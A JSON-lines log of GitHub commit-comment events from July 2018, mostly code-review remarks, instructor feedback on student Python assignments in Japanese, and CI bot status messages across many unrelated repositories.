{"id":"7976266121","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29733835,"position":null,"line":null,"path":null,"commit_id":"6b3d0f840e2a839c4e27c778b87ec1360601b2f0","created_at":"2018-07-17T12:08:20Z","updated_at":"2018-07-17T12:08:20Z","author_association":"NONE","body":"前回指摘の部分に気づいたようですね。OKです。\r\n修正ありがとうございます。"}},"created_at":"2018-07-17T12:08:20Z"}
{"id":"7976273559","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29733841,"position":51,"line":53,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-17T12:09:54Z","updated_at":"2018-07-17T12:09:54Z","author_association":"OWNER","body":"Esse eu não mexi, pois ficou assim no curso anterior, acha que vale a pena modificar mesmo assim? Se sim, eue vou aproveitar e modificar outros, como é o caso do `lanceForMenorQueOUltimoLance()` que da pra retornar o a comparação."}},"created_at":"2018-07-17T12:09:54Z"}
{"id":"7976277382","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29733844,"position":null,"line":null,"path":null,"commit_id":"6ade3a6656bfc1f889e60cad0d1d0816d34f9f75","created_at":"2018-07-17T12:10:42Z","updated_at":"2018-07-17T12:10:42Z","author_association":"NONE","body":"あっ、ほぼ出来てるけど惜しい…\r\n1,2行目と3行目以降、1文字だけずれてる…\r\n少しの修正で済みそうです。間に合えば修正してみてください。"}},"created_at":"2018-07-17T12:10:42Z"}
{"id":"7976288811","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29733861,"position":5,"line":466,"path":"build.py","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T12:12:59Z","updated_at":"2018-07-17T12:12:59Z","author_association":"COLLABORATOR","body":"This has nothing to do with this specific issue, actually my default python interpreter is python3 and build.py needs to be run on python2.7 and the subprocesses too, that's why I changed it, because translation build was failing otherwise"}},"created_at":"2018-07-17T12:12:59Z"}
{"id":"7976290064","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29733866,"position":null,"line":null,"path":null,"commit_id":"e58110949972783cef0353e55fca36762aa01cea","created_at":"2018-07-17T12:13:14Z","updated_at":"2018-07-17T12:13:14Z","author_association":"NONE","body":"あっ、一般的には禁じ手を使ってます!\r\nソースコード内には絵文字入れないようにしましょう。(20行目)\r\n環境依存性があり、UTF-8でも対処できないことがあるので。\r\n\r\nあとの部分は問題なしです。"}},"created_at":"2018-07-17T12:13:14Z"}
{"id":"7976291733","type":"CommitCommentEvent","actor":{"login":"cleverbeagle"},"repo":{"name":"cleverbeagle/pup"},"payload":{"comment":{"id":29733870,"position":null,"line":null,"path":null,"commit_id":"41e9732d0c64c470e90586491fb8630fa1992fbf","created_at":"2018-07-17T12:13:35Z","updated_at":"2018-07-17T12:13:35Z","author_association":"OWNER","body":"We should just treat the component itself as the index.js file instead of adding in an extra file. So, take the contents of `AccountPageFooter.js` for example and move it into `index.js`.\r\n\r\nWhat do you think?"}},"created_at":"2018-07-17T12:13:35Z"}
{"id":"7976292888","type":"CommitCommentEvent","actor":{"login":"Jpkat92"},"repo":{"name":"andela/hc-aces-kla"},"payload":{"comment":{"id":29733873,"position":26,"line":26,"path":"hc/api/tests/test_protocols.py","commit_id":"5863024d32f6b7d13a2b0010ebe5eed7ecbb5fd9","created_at":"2018-07-17T12:13:50Z","updated_at":"2018-07-17T12:13:50Z","author_association":"COLLABORATOR","body":"@matthewacha I have observed a lot of setup of test data within this test. To keep it concise, I would rather you put that within the setup method at the beginning.\r\n\r\nOtherwise great job"}},"created_at":"2018-07-17T12:13:50Z"}
{"id":"7976296332","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29733876,"position":26,"line":43,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-17T12:14:33Z","updated_at":"2018-07-17T12:14:33Z","author_association":"OWNER","body":"This is necessary here: `<h1>{% trans 'Participants of' %} {{ name }}</h1>`."}},"created_at":"2018-07-17T12:14:33Z"}
{"id":"7976300386","type":"CommitCommentEvent","actor":{"login":"Nikvt"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29733882,"position":10,"line":9,"path":"app/controllers/application_controller.rb","commit_id":"45fedc93e4cac9f1259545445ef20345078a4d81","created_at":"2018-07-17T12:15:20Z","updated_at":"2018-07-17T12:15:20Z","author_association":"OWNER","body":"Effectivement :)"}},"created_at":"2018-07-17T12:15:20Z"}
{"id":"7976305964","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733891,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-17T12:16:27Z","updated_at":"2018-07-17T12:16:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T12:16:27Z"}
{"id":"7976307074","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29733893,"position":null,"line":null,"path":null,"commit_id":"2c26a28af315dca16d22ded335d6bfe41d4eb6af","created_at":"2018-07-17T12:16:42Z","updated_at":"2018-07-17T12:16:42Z","author_association":"NONE","body":"Please stop this test\r\na) Test should be new: TunedTrappedRook against base: TunedTrappedRook, not against base: master !\r\nb) the options should be the same for new and base (at both place it shall read:\r\n    Hash=128 nodestime=600\r\n"}},"created_at":"2018-07-17T12:16:42Z"}
{"id":"7976307585","type":"CommitCommentEvent","actor":{"login":"TiKeil"},"repo":{"name":"dune-community/dune-xt-common"},"payload":{"comment":{"id":29733895,"position":null,"line":null,"path":null,"commit_id":"3fad6445c367998a8d2918e8e03e68a263c3f0a1","created_at":"2018-07-17T12:16:48Z","updated_at":"2018-07-17T12:16:48Z","author_association":"MEMBER","body":"Is this really correct? This change causes a runtime error in each test I run. \r\nThis is probably not supposed to be like this, @ftalbrecht ? Your tests probably work?  "}},"created_at":"2018-07-17T12:16:48Z"}
{"id":"7976309028","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29733897,"position":8,"line":9,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-17T12:17:06Z","updated_at":"2018-07-17T12:17:06Z","author_association":"OWNER","body":"Improved this a bit."}},"created_at":"2018-07-17T12:17:06Z"}
{"id":"7976309151","type":"CommitCommentEvent","actor":{"login":"vorrax"},"repo":{"name":"kinerity/trackers"},"payload":{"comment":{"id":29733899,"position":null,"line":null,"path":null,"commit_id":"069b86f727aca77068aa0eb2f7e379351646d27e","created_at":"2018-07-17T12:17:08Z","updated_at":"2018-07-17T12:17:08Z","author_association":"NONE","body":"Hello, thank you for this public repo.\r\n\r\nI've try to install your Trackers ext to my phpbb 3.2, but can't find the admin part or a way to create projects.  \r\nNothing concerning the trackers ext  in the admin panel.    Can you help ?"}},"created_at":"2018-07-17T12:17:08Z"}
{"id":"7976315649","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29733911,"position":null,"line":null,"path":null,"commit_id":"54af997cb379639a816c56a3a0b678390be03baf","created_at":"2018-07-17T12:18:26Z","updated_at":"2018-07-17T12:18:26Z","author_association":"NONE","body":"課題の出力結果ですが、サンプルと出力がだいぶズレてるようですね。\r\nパイプだけが出ている行が10行あります。\r\n\r\n九九を出力する箇所自体は問題ないので、あと少しな感じがします。\r\n他のコード参考にしても良いので、時間あれば修正してみてくださいね。\r\n\r\nあと、マシンの時計がずれてるかもしれません。確認してみてください。"}},"created_at":"2018-07-17T12:18:26Z"}
{"id":"7976318540","type":"CommitCommentEvent","actor":{"login":"lxgreen"},"repo":{"name":"wix-incubator/rich-content"},"payload":{"comment":{"id":29733912,"position":null,"line":null,"path":null,"commit_id":"070b4cdff7df7f73c02be179fa5f259fd439032f","created_at":"2018-07-17T12:19:04Z","updated_at":"2018-07-17T12:19:04Z","author_association":"CONTRIBUTOR","body":"cool 10x"}},"created_at":"2018-07-17T12:19:04Z"}
{"id":"7976323661","type":"CommitCommentEvent","actor":{"login":"merlinpatt"},"repo":{"name":"cleverbeagle/pup"},"payload":{"comment":{"id":29733918,"position":null,"line":null,"path":null,"commit_id":"41e9732d0c64c470e90586491fb8630fa1992fbf","created_at":"2018-07-17T12:20:06Z","updated_at":"2018-07-17T12:20:06Z","author_association":"COLLABORATOR","body":"Yes, I plan for that to be the case. This is the initial move just so everything is still working and the file structure is there. Then I'm going to break the components up and stitch them back together inside index."}},"created_at":"2018-07-17T12:20:06Z"}
{"id":"7976324753","type":"CommitCommentEvent","actor":{"login":"ijustbsd"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29733926,"position":5,"line":15,"path":"ipt_connect/IPTdev/templates/IPTdev/tournament_overview.html","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-17T12:20:20Z","updated_at":"2018-07-17T12:20:20Z","author_association":"OWNER","body":"I deleted these variables because when you start a new tournament you have to change the html-templates anyway."}},"created_at":"2018-07-17T12:20:20Z"}
{"id":"7976328954","type":"CommitCommentEvent","actor":{"login":"cleverbeagle"},"repo":{"name":"cleverbeagle/pup"},"payload":{"comment":{"id":29733935,"position":null,"line":null,"path":null,"commit_id":"41e9732d0c64c470e90586491fb8630fa1992fbf","created_at":"2018-07-17T12:21:11Z","updated_at":"2018-07-17T12:21:11Z","author_association":"OWNER","body":"Ah, right on! 🤐"}},"created_at":"2018-07-17T12:21:11Z"}
{"id":"7976329763","type":"CommitCommentEvent","actor":{"login":"latheesh"},"repo":{"name":"latheesh/java"},"payload":{"comment":{"id":29733936,"position":null,"line":null,"path":null,"commit_id":"4031e4416d74be1f39922b28794a8c0b6cbf9af3","created_at":"2018-07-17T12:21:20Z","updated_at":"2018-07-17T12:21:20Z","author_association":"OWNER","body":"Removed"}},"created_at":"2018-07-17T12:21:20Z"}
{"id":"7976329881","type":"CommitCommentEvent","actor":{"login":"kamidev"},"repo":{"name":"surveyjs/surveyjs"},"payload":{"comment":{"id":29733937,"position":null,"line":null,"path":null,"commit_id":"f2af3a10d3fcae4f506c7042fdc53ce55c5d8506","created_at":"2018-07-17T12:21:22Z","updated_at":"2018-07-17T12:21:22Z","author_association":"NONE","body":"Aha, so it was that. Yes, I saw it last week and had to reinstall a few things, too. Thanks! "}},"created_at":"2018-07-17T12:21:22Z"}
{"id":"7976335168","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29733961,"position":null,"line":null,"path":null,"commit_id":"2c26a28af315dca16d22ded335d6bfe41d4eb6af","created_at":"2018-07-17T12:22:26Z","updated_at":"2018-07-17T12:22:26Z","author_association":"OWNER","body":"Thanks for help. I submitted new test."}},"created_at":"2018-07-17T12:22:26Z"}
{"id":"7976337783","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29733964,"position":null,"line":null,"path":null,"commit_id":"2c26a28af315dca16d22ded335d6bfe41d4eb6af","created_at":"2018-07-17T12:22:59Z","updated_at":"2018-07-17T12:22:59Z","author_association":"NONE","body":"Looks good. Good luck !"}},"created_at":"2018-07-17T12:22:59Z"}
{"id":"7976338495","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29733965,"position":null,"line":null,"path":null,"commit_id":"7e9cb13dd8aae56169b45b10ba53aa04dad44158","created_at":"2018-07-17T12:23:08Z","updated_at":"2018-07-17T12:23:08Z","author_association":"NONE","body":"課題OKです。whileで実装したんですね。\r\n僕がwhileで実装したのも大体この感じでした。"}},"created_at":"2018-07-17T12:23:08Z"}
{"id":"7976339865","type":"CommitCommentEvent","actor":{"login":"HenriqueCaires"},"repo":{"name":"HenriqueCaires/ZabbixApi"},"payload":{"comment":{"id":29733967,"position":null,"line":null,"path":null,"commit_id":"22685198f09f04e2e46447fa4f16fa6e3f98d416","created_at":"2018-07-17T12:23:25Z","updated_at":"2018-07-17T12:23:25Z","author_association":"OWNER","body":"Actually, I've reverted to int type because Zabbix 3.0 (Current LTS) uses it as int. Currently, Zabbix is using it as string only on version 3.4 whose full suport ends on September, 2018. Next LTS version (4.0) will use it as string, as you mention, so I'm going to change this package after its release"}},"created_at":"2018-07-17T12:23:25Z"}
{"id":"7976343865","type":"CommitCommentEvent","actor":{"login":"fmalcher"},"repo":{"name":"angular-schule/website-articles"},"payload":{"comment":{"id":29733974,"position":4,"line":3,"path":"community-updates/ngHeidelberg.md","commit_id":"064c714401452f2d813232af0c008dba7b1a1554","created_at":"2018-07-17T12:24:12Z","updated_at":"2018-07-17T12:24:12Z","author_association":"MEMBER","body":"?? @JohannesHoppe "}},"created_at":"2018-07-17T12:24:12Z"}
{"id":"7976369977","type":"CommitCommentEvent","actor":{"login":"redmerloen"},"repo":{"name":"VoIPGRID/VialerSIPLib"},"payload":{"comment":{"id":29734023,"position":null,"line":null,"path":null,"commit_id":"dffcdf49a62476fcea9325a97452ccc444995020","created_at":"2018-07-17T12:29:19Z","updated_at":"2018-07-17T12:29:19Z","author_association":"CONTRIBUTOR","body":"It is doing that am I not correct?"}},"created_at":"2018-07-17T12:29:19Z"}
{"id":"7976372529","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29734029,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-17T12:29:51Z","updated_at":"2018-07-17T12:29:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T12:29:51Z"}
{"id":"7976373629","type":"CommitCommentEvent","actor":{"login":"Splaxi"},"repo":{"name":"d365collaborative/d365fo.tools"},"payload":{"comment":{"id":29734032,"position":null,"line":null,"path":null,"commit_id":"c3cf73a8cb512fbacf2c3bea1aba771360b8ac22","created_at":"2018-07-17T12:30:04Z","updated_at":"2018-07-17T12:30:04Z","author_association":"CONTRIBUTOR","body":"Great catch! We'll take it into the next release 😀"}},"created_at":"2018-07-17T12:30:04Z"}
{"id":"7976373954","type":"CommitCommentEvent","actor":{"login":"yaakov-h"},"repo":{"name":"SteamRE/SteamKit"},"payload":{"comment":{"id":29734033,"position":5,"line":36,"path":"Resources/Protobufs/steamclient/generate-base.bat","commit_id":"6593190091bc32d5deb7161a1d50588217faefa6","created_at":"2018-07-17T12:30:09Z","updated_at":"2018-07-17T12:30:09Z","author_association":"MEMBER","body":"Hmm, oops"}},"created_at":"2018-07-17T12:30:09Z"}
{"id":"7976382982","type":"CommitCommentEvent","actor":{"login":"saulshanabrook"},"repo":{"name":"plures/xndtools"},"payload":{"comment":{"id":29734057,"position":32,"line":157,"path":"xndtools/c_utils.py","commit_id":"8c46cdfddc1ff7ffd9dd40a33d102bdd543e4280","created_at":"2018-07-17T12:31:53Z","updated_at":"2018-07-17T12:31:53Z","author_association":"MEMBER","body":"That regex before was getting pretty hairy :)"}},"created_at":"2018-07-17T12:31:53Z"}
{"id":"7976383712","type":"CommitCommentEvent","actor":{"login":"fpdjsns"},"repo":{"name":"fpdjsns/APITest"},"payload":{"comment":{"id":29734060,"position":null,"line":null,"path":null,"commit_id":"36eea0e5dbcd4cfa954a99be1440690ec9b9a797","created_at":"2018-07-17T12:32:02Z","updated_at":"2018-07-17T12:32:02Z","author_association":"OWNER","body":"make arithmetic operation API"}},"created_at":"2018-07-17T12:32:02Z"}
{"id":"7976383890","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29734062,"position":84,"line":728,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T12:32:04Z","updated_at":"2018-07-17T12:32:04Z","author_association":"COLLABORATOR","body":"Hmm I didnt know it could be used transitively but maybe it's because I'm\nWanlî.\n\nOn Tue, Jul 17, 2018, 2:39 PM koguzhan <notifications@github.com> wrote:\n\n> şeyleri ulamak? sesleri ulamak, bağcığı ulamak etc. Kinda rare.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/2751eb5c67451bfe4f4bc5163101da01b20c87a0#commitcomment-29733474>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2jtVqw21BDlonqk9a49gtlcGziHEks5uHczkgaJpZM4VSOG3>\n> .\n>\n"}},"created_at":"2018-07-17T12:32:04Z"}
{"id":"7976386658","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29734073,"position":null,"line":null,"path":null,"commit_id":"f7bac17a85f2ef0f421a987edba78655c06daef8","created_at":"2018-07-17T12:32:36Z","updated_at":"2018-07-17T12:32:36Z","author_association":"NONE","body":"計算結果は表示されていますが、サンプルに提示した上と左の見出しがないですね。\r\nforをネストする際の変数名ですが、i, jとかn, mとかx, yとかが一般的にはよく使われます。\r\nちなみにiはinteger(整数)のi、nはnatural number(自然数)のnからきてます。\r\nxは数学でよく使われるやつですね。(由来はよくわかってませんが^^;)"}},"created_at":"2018-07-17T12:32:36Z"}
{"id":"7976389600","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29734080,"position":null,"line":null,"path":null,"commit_id":"d8946df8eb342c0a7c56c59444c12f5682aa0f5d","created_at":"2018-07-17T12:33:11Z","updated_at":"2018-07-17T12:33:11Z","author_association":"COLLABORATOR","body":"Also see [Crypto++ | PR 668](https://github.com/weidai11/cryptopp/pull/668) and [Kovri | PR 909](https://github.com/monero-project/kovri/pull/909)."}},"created_at":"2018-07-17T12:33:11Z"}
{"id":"7976393832","type":"CommitCommentEvent","actor":{"login":"armandfardeau"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29734091,"position":2,"line":3,"path":"decidim-budgets/lib/decidim/extends/project_extend.rb","commit_id":"b601871ee74c4860c248c3049a7a9f58c2dea669","created_at":"2018-07-17T12:34:01Z","updated_at":"2018-07-17T12:34:01Z","author_association":"NONE","body":"Hi @ludivinecp , I don't understand what was the purpose of this extend? Why were you overriding this method with a method from commentable class?"}},"created_at":"2018-07-17T12:34:01Z"}
{"id":"7976395708","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29734098,"position":10,"line":30,"path":"src/checkin/checkInActions.js","commit_id":"27610973f812d74d476bc90b6cc15b3985ca05b8","created_at":"2018-07-17T12:34:24Z","updated_at":"2018-07-17T12:34:24Z","author_association":"MEMBER","body":"Thanks @mogoodrich , it makes sense. I refactored the checkin actions. Please let me know if that it is clearer. Thanks."}},"created_at":"2018-07-17T12:34:24Z"}
{"id":"7976395994","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29734099,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-17T12:34:27Z","updated_at":"2018-07-17T12:34:27Z","author_association":"CONTRIBUTOR","body":"@lukehutch looks like you sorted out the Eclipse problem :+1:  this is what I had in mind for Moditect https://github.com/lukehutch/fast-classpath-scanner/pull/211"}},"created_at":"2018-07-17T12:34:27Z"}
{"id":"7976396828","type":"CommitCommentEvent","actor":{"login":"lnicolet"},"repo":{"name":"RameshBhupathi/PickerView"},"payload":{"comment":{"id":29734101,"position":null,"line":null,"path":null,"commit_id":"310e2dfc2ca4d617b9d4350ab3b9a6ca0ae0eb91","created_at":"2018-07-17T12:34:37Z","updated_at":"2018-07-17T12:34:37Z","author_association":"NONE","body":"Thanks for accepting the pull request, can you update the library to maven? If I include it in my project right now I'm not able to see these edits.\r\n\r\nThanks again"}},"created_at":"2018-07-17T12:34:37Z"}
{"id":"7976398490","type":"CommitCommentEvent","actor":{"login":"VMoonLight"},"repo":{"name":"VMoonLight/study_web"},"payload":{"comment":{"id":29734110,"position":4,"line":7,"path":"chapter3/journal.html","commit_id":"23142e383ae5e55fc9aed03a4e69296913f1182a","created_at":"2018-07-17T12:34:57Z","updated_at":"2018-07-17T12:34:57Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-17T12:34:57Z"}
{"id":"7976404708","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29734128,"position":null,"line":null,"path":null,"commit_id":"d35abae811f2fd14d9250d667036e212a0d381d5","created_at":"2018-07-17T12:36:11Z","updated_at":"2018-07-17T12:36:11Z","author_association":"NONE","body":"お疲れ様です。大体正解と言いたいですが、穴埋めされた文章をプロンプトにして入力を求めるプログラムになっていて、結局キーボードから入力した値を表示するという、ちょっと目的と違うプログラムになってるかな?\r\n求めたことは一応出来てるのでOKです。"}},"created_at":"2018-07-17T12:36:11Z"}
{"id":"7976405865","type":"CommitCommentEvent","actor":{"login":"felmarlop"},"repo":{"name":"mmerce/bigml-node"},"payload":{"comment":{"id":29734136,"position":null,"line":null,"path":null,"commit_id":"8a9a358ecac72ca18c72e99fed632fce7fd33c0d","created_at":"2018-07-17T12:36:24Z","updated_at":"2018-07-17T12:36:24Z","author_association":"NONE","body":"I just adapted neutronia with this, thanks @mmerce "}},"created_at":"2018-07-17T12:36:24Z"}
{"id":"7976416483","type":"CommitCommentEvent","actor":{"login":"pieper"},"repo":{"name":"OHIF/Viewers"},"payload":{"comment":{"id":29734157,"position":56,"line":56,"path":"Packages/ohif-viewerbase/client/lib/classes/OHIFPlugin.js","commit_id":"92408d4c869a7ca1c63f8653d2770cd73852edb2","created_at":"2018-07-17T12:38:23Z","updated_at":"2018-07-17T12:38:23Z","author_association":"MEMBER","body":"Yes, let's get rid of this so as not to clutter the window namespace."}},"created_at":"2018-07-17T12:38:23Z"}
{"id":"7976419557","type":"CommitCommentEvent","actor":{"login":"pieper"},"repo":{"name":"OHIF/Viewers"},"payload":{"comment":{"id":29734160,"position":51,"line":51,"path":"Packages/ohif-viewerbase/client/lib/classes/OHIFPlugin.js","commit_id":"92408d4c869a7ca1c63f8653d2770cd73852edb2","created_at":"2018-07-17T12:39:00Z","updated_at":"2018-07-17T12:39:00Z","author_association":"MEMBER","body":"I think OHIFPlugins.entryPoints makes more sense - keeps it localized."}},"created_at":"2018-07-17T12:39:00Z"}
{"id":"7976421144","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29734161,"position":null,"line":null,"path":null,"commit_id":"70b89dac5dbf7740746d8f338a2a1003ea225bb7","created_at":"2018-07-17T12:39:18Z","updated_at":"2018-07-17T12:39:18Z","author_association":"NONE","body":"あ、あと拡張子はpyでなくmdです。\r\n問題文に書きましたが、pathは下記にしてください。\r\ndocs/algo-s2/task20180717_3.md"}},"created_at":"2018-07-17T12:39:18Z"}
{"id":"7976421749","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology-playground/docker_images"},"payload":{"comment":{"id":29734163,"position":null,"line":null,"path":null,"commit_id":"fdee6eb70962c27fa5f347503d0c39b443931c4d","created_at":"2018-07-17T12:39:24Z","updated_at":"2018-07-17T12:39:24Z","author_association":"MEMBER","body":"Mhh, I think this is a problem in the superbuild. Ideally it should be possible to overwrite the values set in `ProjectTags.cmake`. "}},"created_at":"2018-07-17T12:39:24Z"}
{"id":"7976422192","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29734164,"position":null,"line":null,"path":null,"commit_id":"e8f87d02371a09f7a4cc9106750c3c6ff0a3122b","created_at":"2018-07-17T12:39:29Z","updated_at":"2018-07-17T12:39:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-123928 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-123928\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T12:39:29Z"}
{"id":"7976424470","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29734166,"position":5,"line":43,"path":"languagetool-gui-commons/src/main/java/org/languagetool/gui/Configuration.java","commit_id":"96aa70a5111715ce848f9d2567b949f869c806fa","created_at":"2018-07-17T12:39:55Z","updated_at":"2018-07-17T12:39:55Z","author_association":"CONTRIBUTOR","body":"In principle all issues I talked about are examples for text-level rules. I didn't change anything on the check of the sentence rules.\r\nJust I did a additional test on my notebook (not the fastest). If I switch the options to full check, it took ~100 seconds till a 50k text is checked. The visualVM shows for the same document only a little peak for a check of only the actual paragraph and a higher but also small peak for the check of 2n+1 paragraphs.\r\nI fear, the number of sentence which have to be checked are the problem, much sentences decrease the performance.\r\nBy the way, the standalone version takes ~ 120 seconds to check a change on the same text on the same machine. "}},"created_at":"2018-07-17T12:39:55Z"}
{"id":"7976427146","type":"CommitCommentEvent","actor":{"login":"FearlessZander"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29734173,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-17T12:40:25Z","updated_at":"2018-07-17T12:40:25Z","author_association":"NONE","body":"Maybe show a video how does the hack work? Or you can make one and show it\nto us? :)\n\nOn Mon, Jul 16, 2018 at 11:08 AM, JazzyAbyss <jazzyabyss@gmail.com> wrote:\n\n> How do i do this?\n>\n>\n>\n>\n> On Monday, July 16, 2018, InitialFail <notifications@github.com> wrote:\n>\n>> If by \"last part\" you mean opening in separate Chrome user data\n>> directories, then just launch Chrome multiple times with different\n>> --user-data-dir values like --user-data-dir=/tmp/profile01,\n>> --user-data-dir=/tmp/profile02, --user-data-dir=/tmp/profile03, etc. If\n>> you're still confused, you should learn about the command line.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/InitialFail/driftin-bots/commit/12bfa4aa0dd04d4634687aa8703f777bdc07725e#commitcomment-29713499>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AnUi7y5HZPKOKtonRQavgOaQ5KXXw-wQks5uG3UzgaJpZM4VPzZi>\n>> .\n>>\n>\n"}},"created_at":"2018-07-17T12:40:25Z"}
